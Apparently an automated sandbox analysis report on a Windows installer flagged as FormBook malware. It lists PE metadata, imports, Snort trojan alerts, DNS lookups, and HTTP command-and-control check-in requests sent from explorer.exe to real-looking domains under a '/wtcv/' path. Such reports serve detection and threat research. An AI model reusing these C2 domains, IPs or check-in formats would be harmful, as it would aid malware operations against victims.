                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebx
                                                mov dword ptr [esp+14h], 00409168h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B0h]
                                                call dword ptr [004070ACh]
                                                cmp ax, 00000006h
                                                je 00007FBC547D84F3h
                                                push ebx
                                                call 00007FBC547DB2D4h
                                                cmp eax, ebx
                                                je 00007FBC547D84E9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00407280h
                                                push esi
                                                call 00007FBC547DB250h
                                                push esi
                                                call dword ptr [00407108h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007FBC547D84CDh
                                                push 0000000Dh
                                                call 00007FBC547DB2A8h
                                                push 0000000Bh
                                                call 00007FBC547DB2A1h
                                                mov dword ptr [0042EC24h], eax
                                                call dword ptr [00407038h]
                                                push ebx
                                                call dword ptr [0040726Ch]
                                                mov dword ptr [0042ECD8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 00429058h
                                                call dword ptr [0040715Ch]
                                                push 0040915Ch
                                                push 0042E420h
                                                call 00007FBC547DAED4h
                                                call dword ptr [0040710Ch]
                                                mov ebp, 00434000h
                                                push eax
                                                push ebp
                                                call 00007FBC547DAEC2h
                                                push ebx
                                                call dword ptr [00407144h]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x1fcb8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x5e660x6000False0.670572916667data6.44065573436IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x12a20x1400False0.4455078125data5.0583287871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x25d180x600False0.458984375data4.18773476617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x370000x1fcb80x1fe00False0.38359375data5.99100948906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x372800x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                RT_ICON0x47aa80x6f7aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                RT_ICON0x4ea280x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x52c500x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x551f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x562a00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                RT_DIALOG0x567080x100dataEnglishUnited States
                                                RT_DIALOG0x568080x11cdataEnglishUnited States
                                                RT_DIALOG0x569280x60dataEnglishUnited States
                                                RT_GROUP_ICON0x569880x5adataEnglishUnited States
                                                RT_MANIFEST0x569e80x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                Imports

                                                DLLImport
                                                KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                11/04/21-11:49:10.345950TCP1201ATTACK-RESPONSES 403 Forbidden804976034.102.136.180192.168.2.6
                                                11/04/21-11:49:15.409408TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.634.102.136.180
                                                11/04/21-11:49:15.409408TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.634.102.136.180
                                                11/04/21-11:49:15.409408TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.634.102.136.180
                                                11/04/21-11:49:15.526365TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.6
                                                11/04/21-11:49:26.412220TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.6153.127.214.206
                                                11/04/21-11:49:26.412220TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.6153.127.214.206
                                                11/04/21-11:49:26.412220TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.6153.127.214.206

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 4, 2021 11:49:10.211590052 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.230325937 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:10.230520010 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.230787992 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.249495029 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:10.345949888 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:10.346048117 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:10.346096039 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.346160889 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.659367085 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.678026915 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.391933918 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.408896923 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.409070969 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.409408092 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.426412106 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.526365042 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.526426077 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.526756048 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.526823044 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.831765890 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.850500107 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:20.565169096 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.587682009 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:20.590507030 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.590734005 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.613791943 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:20.613830090 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:20.613846064 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:20.614064932 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.616709948 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.639265060 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:26.100131035 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:26.411873102 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:26.412035942 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:26.412220001 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:26.716120005 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:26.820693016 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:26.911021948 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:27.061523914 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:27.061583996 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:27.061712027 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:27.064249992 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:27.218399048 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:27.219957113 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:36.965390921 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:36.988444090 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:36.988626003 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:36.988871098 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:37.012037992 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:37.027247906 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:37.027307987 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:37.027590990 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:37.027663946 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:37.050609112 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:47.147589922 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.178508043 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.178898096 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.179642916 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.211309910 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.680707932 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.750653982 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.760755062 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.760783911 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.760900974 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.760941982 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:52.731015921 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.754976988 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:52.755201101 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.756943941 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.780973911 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:52.781173944 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:52.781208038 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:52.781493902 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.782634974 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.806570053 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:57.861294031 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.904347897 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:49:57.904489994 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.904726028 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.947076082 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:49:57.947346926 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:49:57.947367907 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:49:57.947566032 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.947731972 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.989968061 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:50:03.400053978 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.433895111 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.434012890 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.434360027 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.468027115 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508599043 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508635998 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508655071 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508694887 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508887053 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.508944035 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.512593031 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.546569109 CET804977935.246.6.109192.168.2.6

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 4, 2021 11:49:10.172384977 CET5177453192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:10.202804089 CET53517748.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:15.357218981 CET5602353192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:15.389322996 CET53560238.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:20.540076017 CET5838453192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:20.563623905 CET53583848.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:25.845139980 CET5606153192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:26.097970963 CET53560618.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:36.942981958 CET5833653192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:36.963466883 CET53583368.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:42.073613882 CET5378153192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:42.109395027 CET53537818.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:47.123650074 CET5406453192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:47.145673037 CET53540648.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:52.706044912 CET5281153192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:52.729083061 CET53528118.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:57.837305069 CET5529953192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:57.860071898 CET53552998.8.8.8192.168.2.6
                                                Nov 4, 2021 11:50:03.351473093 CET6374553192.168.2.68.8.8.8
                                                Nov 4, 2021 11:50:03.392386913 CET53637458.8.8.8192.168.2.6
                                                Nov 4, 2021 11:50:08.528608084 CET5005553192.168.2.68.8.8.8
                                                Nov 4, 2021 11:50:08.554653883 CET53500558.8.8.8192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Nov 4, 2021 11:49:10.172384977 CET192.168.2.68.8.8.80x9f44Standard query (0)www.worryterrible.spaceA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:15.357218981 CET192.168.2.68.8.8.80x646aStandard query (0)www.americanvisionvinyl.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:20.540076017 CET192.168.2.68.8.8.80x9f1fStandard query (0)www.iccsukltd.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:25.845139980 CET192.168.2.68.8.8.80x1e93Standard query (0)www.harada-insatsu.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:36.942981958 CET192.168.2.68.8.8.80x3276Standard query (0)www.affiliatemarketingproducts.xyzA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:42.073613882 CET192.168.2.68.8.8.80xd1e8Standard query (0)www.dempseynutrition.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:47.123650074 CET192.168.2.68.8.8.80x226dStandard query (0)www.bezhantrading.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:52.706044912 CET192.168.2.68.8.8.80x1c5bStandard query (0)www.alles-abgedeckt.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:57.837305069 CET192.168.2.68.8.8.80x5d27Standard query (0)www.leads-mania.clubA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:50:03.351473093 CET192.168.2.68.8.8.80xbfb5Standard query (0)www.tankomixing.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:50:08.528608084 CET192.168.2.68.8.8.80x7132Standard query (0)www.sddn13.xyzA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Nov 4, 2021 11:49:10.202804089 CET8.8.8.8192.168.2.60x9f44No error (0)www.worryterrible.spaceworryterrible.spaceCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:10.202804089 CET8.8.8.8192.168.2.60x9f44No error (0)worryterrible.space34.102.136.180A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:15.389322996 CET8.8.8.8192.168.2.60x646aNo error (0)www.americanvisionvinyl.comamericanvisionvinyl.comCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:15.389322996 CET8.8.8.8192.168.2.60x646aNo error (0)americanvisionvinyl.com34.102.136.180A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:20.563623905 CET8.8.8.8192.168.2.60x9f1fNo error (0)www.iccsukltd.com217.160.0.33A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:26.097970963 CET8.8.8.8192.168.2.60x1e93No error (0)www.harada-insatsu.comharada-insatsu.comCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:26.097970963 CET8.8.8.8192.168.2.60x1e93No error (0)harada-insatsu.com153.127.214.206A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:36.963466883 CET8.8.8.8192.168.2.60x3276No error (0)www.affiliatemarketingproducts.xyz172.67.184.156A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:36.963466883 CET8.8.8.8192.168.2.60x3276No error (0)www.affiliatemarketingproducts.xyz104.21.68.12A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:42.109395027 CET8.8.8.8192.168.2.60xd1e8Name error (3)www.dempseynutrition.comnonenoneA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:47.145673037 CET8.8.8.8192.168.2.60x226dNo error (0)www.bezhantrading.combezhantrading.comCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:47.145673037 CET8.8.8.8192.168.2.60x226dNo error (0)bezhantrading.com104.248.163.187A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:52.729083061 CET8.8.8.8192.168.2.60x1c5bNo error (0)www.alles-abgedeckt.com46.38.243.234A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:57.860071898 CET8.8.8.8192.168.2.60x5d27No error (0)www.leads-mania.clubleads-mania.clubCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:57.860071898 CET8.8.8.8192.168.2.60x5d27No error (0)leads-mania.club138.68.74.116A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)www.tankomixing.comwww150.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)www150.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:50:08.554653883 CET8.8.8.8192.168.2.60x7132No error (0)www.sddn13.xyzsddn13.xyzCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:08.554653883 CET8.8.8.8192.168.2.60x7132No error (0)sddn13.xyz50.118.182.205A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.worryterrible.space
                                                • www.americanvisionvinyl.com
                                                • www.iccsukltd.com
                                                • www.harada-insatsu.com
                                                • www.affiliatemarketingproducts.xyz
                                                • www.bezhantrading.com
                                                • www.alles-abgedeckt.com
                                                • www.leads-mania.club
                                                • www.tankomixing.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.64976034.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:10.230787992 CET1211OUTGET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1
                                                Host: www.worryterrible.space
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:10.345949888 CET1211INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 04 Nov 2021 10:49:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "6182ae77-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.64976634.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:15.409408092 CET5924OUTGET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.americanvisionvinyl.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:15.526365042 CET5924INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 04 Nov 2021 10:49:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "6182b3d6-113"
                                                Via: 1.1 google
                                                Connection: close
